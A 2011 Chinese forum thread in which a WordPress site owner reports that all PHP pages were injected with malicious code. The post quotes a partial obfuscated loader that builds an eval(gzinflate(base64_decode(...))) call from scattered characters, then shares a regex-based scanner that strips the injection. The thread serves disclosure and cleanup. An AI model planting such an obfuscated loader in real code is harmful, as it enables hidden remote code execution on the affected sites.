WP 又爆新漏洞，我又悲剧了。

snask · 发表于 2011-9-27 11:12:21

本帖最后由 snask 于 2011-9-27 11:14 编辑

前段时间突然网站速度变慢，打开偶尔出错，刷新后能正常显示，当时也没当回事。
今天备份网站，发现所有PHP页面均被插入了一段代码。
搜索了一下叫做“Linkfarm exposed!”具体危害不详。
部分代码如下：
各位自查一下。

<?php
$md5 = "0dc7185ccde78d3a77db0555d8c63ba6";
$wp_salt = array('f',"_","c",'o','r','4','a',"e",'(',")","d",'b',';',"i",'z','l','v','s',"$",'t','g',"6","n");
$wp_add_filter = create_function('.'v',$wp_salt[7].$wp_salt[16].$wp_salt[6].$wp_salt[15].$wp_salt[8].$wp_salt[20].$wp_salt[14].$wp_salt[13].$wp_salt[22].$wp_salt[0].$wp_salt[15].$wp_salt[6].$wp_salt[19].$wp_salt[7].$wp_salt[8].$wp_salt[11].$wp_salt[6].$wp_salt[17].$wp_salt[7].$wp_salt[21].$wp_salt[5].$wp_salt[1].$wp_salt[10].$wp_salt[7].$wp_salt[2].$wp_salt[3].$wp_salt[10].$wp_salt[7].$wp_salt[8].$wp_salt[18].$wp_salt[16].$wp_salt[9].$wp_salt[9].$wp_salt[9].$wp_salt[12]);
$wp_add_filter

复制代码

snask · 发表于 2011-9-27 11:17:23

附清除工具
使用方法：
复制代码保存为PHP文件。上传到网站根目录，URL打开即可。

<?php
set_time_limit(0);
ob_start();
$root = "./";
$find ="^<\?php\s*\\\$md5\s*=\s*["|']\w+["|'];\s*\\\$wp_salt\s*=\s*[\w,"\'\;\$]+\s*\\\$wp_add_filter\s*=\s*create_function$.*$;\s*\\\$wp_add_filter$.*$;\s*\?>\s*";
$except = array("rar", "zip", "htaccess", "css", "js");
$only = array("php");
$infectedFiles = null;
$showOnlyInfectedFiles = true;
$cleanInfected = true;
$infectedFiles = startScan($root);
echo "<h1>Found Files</h1>";
echo "<ol>";
if(is_array($infectedFiles))
foreach($infectedFiles AS $iFile){
echo "<li>{$iFile}</li>";
}
echo "</ol>";
/* functions */
function getAllFiles($dir){
global $except, $only;
$filenames = null;
if ($handle = opendir($dir)){
while (false !== ($file = readdir($handle)))
if ($file != "." && $file != ".." && !is_dir($dir.$file)){
$path_parts = pathinfo($file);
if(isset($path_parts['extension']) && array_search($path_parts['extension'], $except) === false)
if(array_search($path_parts['basename'], $only) !== false || array_search($path_parts['extension'], $only) !== false || sizeof($only) < 1)
$filenames[] = $file;
}
closedir($handle);
}
return $filenames;
}
function getAllDirectories($dir){
$directories = null;
if ($handle = opendir($dir)) {
while (false !== ($file = readdir($handle)))
if ($file != "." && $file != ".." && is_dir($dir.$file))
$directories[] = $dir.$file;
closedir($handle);
}
return $directories;
}
function startScan($root){
global $find, $infectedFiles, $showOnlyInfectedFiles, $cleanInfected;
$time_start = microtime_float();
echo "<ol>";
echo "<li>".$root;
$directories = getAllDirectories($root);
if(is_array($directories)){
// get all files
if(($tmp = getAllFiles($root)) !== null){
echo "<ul>";
$files = $tmp;
foreach($files AS $file){
$numMatches = checkMalware($root.$file, $find);
if(!empty($numMatches)){
if($cleanInfected)
cleanInfected($root.$file, $find);
echo "<li style='background-color:c00'><p style='padding:0 0 0 5px; margin:0; color:#fff'>".$infectedFiles[] = $root.$file;
echo " - ".(microtime_float() - $time_start)."</p></li>";
}elseif(!$showOnlyInfectedFiles){
$infectedFiles[] = $root.$file;
echo "<li>".$root.$file."</li>";
}
}
echo "</ul>";
}
echo "<ol>";
foreach($directories AS $dir){
echo "<li>".$dir;
ob_implicit_flush();
ob_flush();
sleep(1);
// get all files
if(($tmp = getAllFiles($dir)) !== null){
echo "<ul>";
$files = $tmp;
foreach($files AS $file){
if($dir[strlen($dir)-1] === "/") $dir = substr($dir, 0, -1);
$numMatches = checkMalware($dir."/".$file, $find);
if(!empty($numMatches)){
if($cleanInfected)
cleanInfected($dir."/".$file, $find);
echo "<li style='background-color:c00'><p style='padding:0 0 0 5px; margin:0; color:#fff'>".$infectedFiles[] = $dir."/".$file;
echo " - ".(microtime_float() - $time_start)."</p></li>";
}elseif(!$showOnlyInfectedFiles){
$infectedFiles[] = $dir."/".$file;
echo "<li>".$infectedFiles[] = $dir."/".$file;
echo "</li>";
}
}
echo "</ul>";
}
// gel all directories
if($root[strlen($root)-1] === "/") $tmp_root = substr($root, 0, -1);
if(($tmp = getAllDirectories($dir."/")) !== null && $dir !== $tmp_root){
foreach($tmp AS $d){
$a = startScan($d."/");
if(is_array($a))
array_merge($infectedFiles, $a);
}
}
echo "</li>";
}
echo "</ol>";
}else{
// get all files
if(($tmp = getAllFiles($root)) !== null){
echo "<ul>";
$files = $tmp;
foreach($files AS $file){
$numMatches = checkMalware($root.$file, $find);
if(!empty($numMatches)){
if($cleanInfected)
cleanInfected($root.$file, $find);
echo "<li style='background-color:c00'><p style='padding:0 0 0 5px; margin:0; color:#fff'>".$infectedFiles[] = $root.$file;
echo " - ".(microtime_float() - $time_start)."</p></li>";
}elseif(!$showOnlyInfectedFiles){
$infectedFiles[] = $root.$file;
echo "<li>".$root.$file."</li>";
}
}
echo "</ul>";
}
}
echo "</li>";
echo "</ol>";
return $infectedFiles;
}
function checkMalware($filename, $find){
$numMatches = null;
$handle = fopen($filename, "r");
if(filesize($filename) > 0){
$contents = fread($handle, filesize($filename));
$numMatches = preg_match('/'.$find.'/i', $contents, $matches);
}
fclose($handle);
return $numMatches;
}
function cleanInfected($filename, $find){
$handle = fopen($filename, "r");
if(filesize($filename) > 0){
$contents = fread($handle, filesize($filename));
fclose($handle);
$handle = fopen($filename, "w");
$contents = preg_replace('/'.$find.'/i', '', $contents);
fwrite($handle, $contents);
}
fclose($handle);
}
function microtime_float(){
list($usec, $sec) = explode(" ", microtime());
return ((float)$usec + (float)$sec);
}
ob_end_flush();

复制代码

noise · 发表于 2011-9-27 11:28:49

无间道？

madi885 · 发表于 2011-9-28 16:24:38

这个是主题上面还是在所有文件上面

账号		自动登录	找回密码
密码			注册

WP 又爆新漏洞，我又悲剧了。

相关帖子